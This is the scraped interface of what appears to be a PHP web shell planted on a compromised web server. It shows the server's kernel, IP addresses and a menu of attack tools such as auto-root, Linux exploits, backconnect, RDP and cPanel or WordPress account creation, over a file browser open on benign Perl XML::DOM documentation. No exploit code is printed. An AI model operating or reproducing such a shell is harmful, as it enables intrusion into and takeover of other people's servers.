Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
vendor_perl /
XML /
DOM /
[ HOME SHELL ]
Name
Size
Permission
Action
AttDef.pod
662
B
-rw-r--r--
AttlistDecl.pod
1.16
KB
-rw-r--r--
Attr.pod
2.63
KB
-rw-r--r--
CDATASection.pod
1.23
KB
-rw-r--r--
CharacterData.pod
2.75
KB
-rw-r--r--
Comment.pod
438
B
-rw-r--r--
DOMException.pm
1.85
KB
-rw-r--r--
DOMImplementation.pod
665
B
-rw-r--r--
Document.pod
5.52
KB
-rw-r--r--
DocumentFragment.pod
2.03
KB
-rw-r--r--
DocumentType.pod
4.99
KB
-rw-r--r--
Element.pod
4.83
KB
-rw-r--r--
ElementDecl.pod
529
B
-rw-r--r--
Entity.pod
1.07
KB
-rw-r--r--
EntityReference.pod
1.27
KB
-rw-r--r--
NamedNodeMap.pm
5.19
KB
-rw-r--r--
NamedNodeMap.pod
3.56
KB
-rw-r--r--
Node.pod
12.77
KB
-rw-r--r--
NodeList.pm
695
B
-rw-r--r--
NodeList.pod
1.07
KB
-rw-r--r--
Notation.pod
874
B
-rw-r--r--
Parser.pod
2.65
KB
-rw-r--r--
PerlSAX.pm
940
B
-rw-r--r--
ProcessingInstruction.pod
802
B
-rw-r--r--
Text.pod
1.84
KB
-rw-r--r--
XMLDecl.pod
686
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Parser.pod
=head1 NAME XML::DOM::Parser - An XML::Parser that builds XML::DOM document structures =head1 SYNOPSIS use XML::DOM; my $parser = new XML::DOM::Parser; my $doc = $parser->parsefile ("file.xml"); $doc->dispose; # Avoid memory leaks - cleanup circular references =head1 DESCRIPTION XML::DOM::Parser extends L<XML::Parser> The XML::Parser module was written by Clark Cooper and is built on top of XML::Parser::Expat, which is a lower level interface to James Clark's expat library. XML::DOM::Parser parses XML strings or files and builds a data structure that conforms to the API of the Document Object Model as described at L<http://www.w3.org/TR/REC-DOM-Level-1>. See the L<XML::Parser> manpage for other additional properties of the XML::DOM::Parser class. Note that the 'Style' property should not be used (it is set internally.) The XML::Parser B<NoExpand> option is more or less supported, in that it will generate EntityReference objects whenever an entity reference is encountered in character data. I'm not sure how useful this is. Any comments are welcome. As described in the synopsis, when you create an XML::DOM::Parser object, the parse and parsefile methods create an L<XML::DOM::Document> object from the specified input. This Document object can then be examined, modified and written back out to a file or converted to a string. When using XML::DOM with XML::Parser version 2.19 and up, setting the XML::DOM::Parser option B<KeepCDATA> to 1 will store CDATASections in CDATASection nodes, instead of converting them to Text nodes. Subsequent CDATASection nodes will be merged into one. Let me know if this is a problem. =head1 Using LWP to parse URLs The parsefile() method now also supports URLs, e.g. I<http://www.erols.com/enno/xsa.xml>. It uses LWP to download the file and then calls parse() on the resulting string. By default it will use a L<LWP::UserAgent> that is created as follows: use LWP::UserAgent; $LWP_USER_AGENT = LWP::UserAgent->new; $LWP_USER_AGENT->env_proxy; Note that env_proxy reads proxy settings from environment variables, which is what I need to do to get thru our firewall. If you want to use a different LWP::UserAgent, you can either set it globally with: XML::DOM::Parser::set_LWP_UserAgent ($my_agent); or, you can specify it for a specific XML::DOM::Parser by passing it to the constructor: my $parser = new XML::DOM::Parser (LWP_UserAgent => $my_agent); Currently, LWP is used when the filename (passed to parsefile) starts with one of the following URL schemes: http, https, ftp, wais, gopher, or file (followed by a colon.) If I missed one, please let me know. The LWP modules are part of libwww-perl which is available at CPAN.
Close